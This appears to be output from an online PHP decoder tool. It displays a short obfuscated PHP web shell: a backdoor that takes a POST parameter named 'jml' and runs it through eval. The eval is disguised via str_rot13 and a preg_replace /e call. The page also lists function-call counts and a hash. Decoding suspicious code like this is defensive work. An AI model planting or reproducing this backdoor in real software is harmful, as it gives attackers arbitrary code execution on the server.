Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if(isset($_POST['jml'])){($www = $_POST['jml']) && @preg_replace('/ad/e', '@' . str_rot13(..
Decoded Output download
<? if(isset($_POST['jml'])){($www = $_POST['jml']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
?>
Did this file decode correctly?
Original Code
if(isset($_POST['jml'])){($www = $_POST['jml']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
Function Calls
| str_rot13 | 1 |
| preg_replace | 1 |
Stats
| MD5 | 8ae67df2649dddf9b50c0d36868b603b |
| Eval Count | 1 |
| Decode Time | 82 ms |